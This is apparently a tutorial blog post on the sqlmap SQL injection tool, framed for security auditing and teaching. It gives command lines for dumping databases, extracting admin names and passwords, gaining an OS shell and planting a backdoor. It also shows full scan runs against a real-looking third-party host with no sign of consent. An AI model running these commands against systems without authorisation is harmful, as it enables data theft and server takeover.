Hello everyone, today I am sharing an unbeatable Python library: sqlmap.
GitHub address: https://github.com/sqlmapproject/sqlmap
In the field of network security, SQL injection remains one of the most common attacks. sqlmap is an open-source automated SQL injection and database forensics tool that provides a wide range of features for detecting and exploiting SQL injection vulnerabilities. This article introduces sqlmap's installation, features, basic and advanced functions in detail and, together with practical application scenarios, shows how it is used in security testing.

sqlmap is written in Python and can be installed either by cloning its GitHub repository or with pip:
pip install sqlmap
Or:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
Installation is simple, so users can quickly get started with their SQL injection testing work.
Features
Support for a wide range of database systems: MySQL, Oracle, PostgreSQL and others.
Automatic detection of injection points: SQL injection vulnerabilities are detected in an automated way.
Multiple SQL injection techniques: including boolean-based blind, time-based blind, error-based injection and more.
Rich data retrieval features: it can retrieve database names, tables, columns and the corresponding data.

Basic Functions
Automatic detection of injection points
sqlmap can automatically identify SQL injection vulnerabilities; this is one of its most basic functions. The user only needs to supply a suspicious URL and sqlmap can analyze it.
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch
This command automatically tests whether the parameter id in the URL is vulnerable to SQL injection. The --batch option enables non-interactive mode so that no prompts require user interaction during the run.
Output:
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.5.4#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:29:48 /2024-05-13/

[10:29:48] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:29:48] [INFO] testing connection to the target URL
[10:29:49] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:29:49] [INFO] testing if the target URL content is stable
[10:29:49] [INFO] target URL content is stable
[10:29:49] [INFO] testing if URI parameter '#1' is dynamic
[10:29:49] [INFO] heuristics detected web page charset 'utf-8'
[10:29:49] [WARNING] URI parameter '#1' does not appear to be dynamic
[10:29:50] [WARNING] heuristic (basic) test shows that URI parameter '#1' might not be injectable
[10:29:50] [INFO] testing for SQL injection on URI parameter '#1'
[10:29:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:29:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:29:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:29:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:29:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:29:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:29:56] [INFO] testing 'Generic inline queries'
[10:29:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:29:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:29:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:29:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:30:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:30:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:30:02] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:30:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:30:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:30:05] [INFO] target URL appears to have 1 column in query
[10:30:05] [WARNING] applying generic concatenation (CONCAT)
[10:30:05] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[10:30:07] [WARNING] URI parameter '#1' does not seem to be injectable
[10:30:07] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:30:07] [WARNING] HTTP error codes detected during run:
444 (?) - 88 times, 404 (Not Found) - 5 times

[*] ending @ 10:30:07 /2024-05-13/
Retrieving database information
Once a SQL injection vulnerability has been detected, sqlmap can be used to retrieve detailed information about the database, such as its type, version and structure.
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch --banner
This command outputs the database version and other information (for example the version number of MySQL, Oracle or PostgreSQL).
Output:
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.5.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:31:28 /2024-05-13/

[10:31:28] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:31:28] [INFO] testing connection to the target URL
[10:31:28] [INFO] testing if the target URL content is stable
[10:31:29] [INFO] target URL content is stable
[10:31:29] [INFO] testing if URI parameter '#1' is dynamic
[10:31:29] [INFO] heuristics detected web page charset 'utf-8'
[10:31:29] [WARNING] URI parameter '#1' does not appear to be dynamic
[10:31:29] [WARNING] heuristic (basic) test shows that URI parameter '#1' might not be injectable
[10:31:29] [INFO] testing for SQL injection on URI parameter '#1'
[10:31:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:31:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:31:32] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:31:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:31:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:31:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:31:36] [INFO] testing 'Generic inline queries'
[10:31:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:31:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:31:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:31:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:31:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:31:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:31:41] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:31:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:31:43] [WARNING] URI parameter '#1' does not seem to be injectable
[10:31:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:31:43] [WARNING] HTTP error codes detected during run:
444 (?) - 71 times, 404 (Not Found) - 3 times

[*] ending @ 10:31:43 /2024-05-13/
Extracting database data
sqlmap can be used to extract data from the database, including table names, column names and the actual row data.
sqlmap -u "http://example.com/page.php?id=1" --batch --dbs
This command lists all accessible databases.
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname --tables
This command lists all tables in the specified database dbname.
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename --columns
This command lists all columns in the specified table tablename.
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename -C column1,column2 --dump
This command extracts and displays the data of the specified columns column1 and column2 from the specified table.
Advanced Functions
Operating-system-level access
sqlmap can use a SQL injection vulnerability to obtain operating-system-level access. This includes obtaining shell access and even taking full control of the affected server.
sqlmap -u "http://example.com/page.php?id=1" --os-shell
This command attempts to obtain an operating system shell through the SQL injection vulnerability. It uses the database server's vulnerability to execute operating-system commands.
Planting a database backdoor
sqlmap can automatically plant a database backdoor to facilitate future access. This is an advanced technique, usually used in penetration testing.
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
This command attempts to plant a backdoor on the target database server through the SQL injection vulnerability, which usually involves uploading and executing a binary.
Time-based blind injection technique
Time-based blind injection is a technique that operates on response time; sqlmap provides functionality to automate it.
sqlmap -u "http://example.com/page.php?id=1" --technique=T
This command specifies that the time-based blind technique be used for testing. The --technique option selects which type of SQL injection technique to use (B: Boolean-based blind, T: Time-based blind, E: Error-based, U: UNION query-based, S: Stacked queries).
Custom injection points and data extraction
sqlmap allows users to define specific injection points and even to customize the SQL query used to extract data.
sqlmap -u "http://example.com/page.php?id=1" --dbms=MySQL --dump -T users -C name,password --where="role='admin'"
This command specifies extracting the name and password columns from the users table, but only for rows whose role column is admin.
Practical Application Scenarios
Network security auditing
In a network security audit, sqlmap can be used to identify and report SQL injection vulnerabilities in web applications, helping organizations understand and fix potential security risks.
sqlmap -u "http://example.com/page.php?id=1" --risk=3 --level=5 --batch
This command configures sqlmap for in-depth security testing: the --risk and --level options increase the depth and breadth of the tests, and --batch answers prompts automatically.
Penetration testing
In penetration testing, testers use sqlmap to verify suspected vulnerabilities and to assess the damage an attacker could cause by exploiting them.
sqlmap -u "http://example.com/page.php?id=1" --dbs --technique=U
This command enumerates all accessible databases and specifies the UNION query technique, a commonly used SQL injection method.
Security education and training
sqlmap is also widely used in education and training, helping learners understand the principles of SQL injection and how to defend against it.
sqlmap -u "http://example.com/page.php?id=1" --banner
This simple command can be used to show learners how sqlmap obtains the database server's version information, as an introductory demonstration.
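To show learners what sqlmap's boolean-based blind probes are actually detecting, here is an added example (it is not from the article or the sqlmap project) that uses an in-memory SQLite table as an assumed stand-in for the page.php?id=1 backend: the string-concatenated query beside its parameterized fix, and a check that mimics sqlmap's true/false comparison. All table and function names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a small 'articles' table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "public post", 1), (2, "draft post", 0), (3, "other draft", 0)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # Vulnerable: untrusted input is pasted into the SQL text, so the query's
    # structure changes with the input. This is the pattern sqlmap detects.
    sql = f"SELECT title FROM articles WHERE published = 1 AND id = {user_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened: the value travels as a bound parameter and cannot alter the
    # statement; non-numeric input simply matches no row.
    sql = "SELECT title FROM articles WHERE published = 1 AND id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def boolean_probe_differs(lookup, conn: sqlite3.Connection) -> bool:
    # Mirrors the idea behind sqlmap's boolean-based blind check: send a
    # condition that is always true and one that is always false and see
    # whether the responses diverge. With a parameterized backend both
    # probes are just unmatched text, so the results are identical.
    true_case = lookup(conn, "1 AND 1=1")
    false_case = lookup(conn, "1 AND 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", boolean_probe_differs(lookup_vulnerable, db))
    print("parameterized:", boolean_probe_differs(lookup_parameterized, db))
```

Note that in the vulnerable version the injected condition also bypasses the published = 1 filter, which is why a positive sqlmap finding means data exposure, not just an odd response.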
Automation scripts
Using sqlmap's API, developers can write automation scripts that integrate it into more complex security testing workflows.
import subprocess

# Run sqlmap non-interactively; --beep sounds an alert when an injection is found
command = ["sqlmap", "-u", "http://example.com/page.php?id=1", "--batch", "--beep"]
subprocess.run(command, check=True)
This Python script uses sqlmap for automated testing and raises an audible alert when a vulnerability is found.
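Launching sqlmap is only half of an automation workflow; the run output shown earlier still has to be turned into something a report can use. The following added example (not from the article or from sqlmap) parses that [HH:MM:SS] [LEVEL] line format into a summary; the sample log is a constructed excerpt of the run above, and the " is vulnerable" wording used to recognize a positive finding is an assumption about sqlmap messages the article does not show.

```python
import re
from collections import Counter

LINE_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[(\w+)\] (.*)$")
TECH_RE = re.compile(r"^testing '(.+)'$")
CODE_RE = re.compile(r"(\d{3}) \([^)]*\) - (\d+) times")

# Constructed excerpt modelled on the --batch run output shown earlier in the article.
SAMPLE_LOG = """\
[10:29:48] [INFO] testing connection to the target URL
[10:29:49] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:29:50] [WARNING] heuristic (basic) test shows that URI parameter '#1' might not be injectable
[10:29:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:29:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:30:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:30:07] [WARNING] URI parameter '#1' does not seem to be injectable
[10:30:07] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests.
[10:30:07] [WARNING] HTTP error codes detected during run:
444 (?) - 88 times, 404 (Not Found) - 5 times
"""


def summarize_run(log: str) -> dict:
    # Reduce one sqlmap run log to the fields an audit report needs.
    levels = Counter()
    techniques = []
    http_errors = {}
    injectable = None  # stays None if the run never reached a verdict
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            # Untimestamped continuation line, e.g. the HTTP error-code tally
            for code, count in CODE_RE.findall(line):
                http_errors[int(code)] = int(count)
            continue
        _, level, msg = m.groups()
        levels[level] += 1
        t = TECH_RE.match(msg)
        if t:
            techniques.append(t.group(1))
        if "all tested parameters do not appear to be injectable" in msg:
            injectable = False
        elif " is vulnerable" in msg:  # positive-finding wording (assumption)
            injectable = True
    return {
        "injectable": injectable,
        "techniques_tested": techniques,
        "http_errors": http_errors,
        "warnings": levels["WARNING"],
        "critical": levels["CRITICAL"],
    }
```

A large share of non-200 responses (here 88 of status 444) is worth surfacing in the report, since it usually means a WAF or rate limiter shaped the result, which is the same caveat sqlmap raises in its CRITICAL line.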
Summary
sqlmap is a powerful automated SQL injection tool designed to detect, exploit and manage SQL injection vulnerabilities in databases. It supports a wide range of database systems, automatically identifies injection points, and uses multiple techniques to perform thorough extraction of databases, tables and data. Its functions include retrieving database version information, extracting data, accessing the underlying file system and executing remote commands, and it even allows planting backdoors. The tool is suited not only to security professionals performing security audits and penetration tests, but is also widely used in security education and training to help people understand and defend against SQL injection attacks. Through its command-line interface and API, sqlmap makes automated testing very convenient and is an indispensable tool in the field of network security.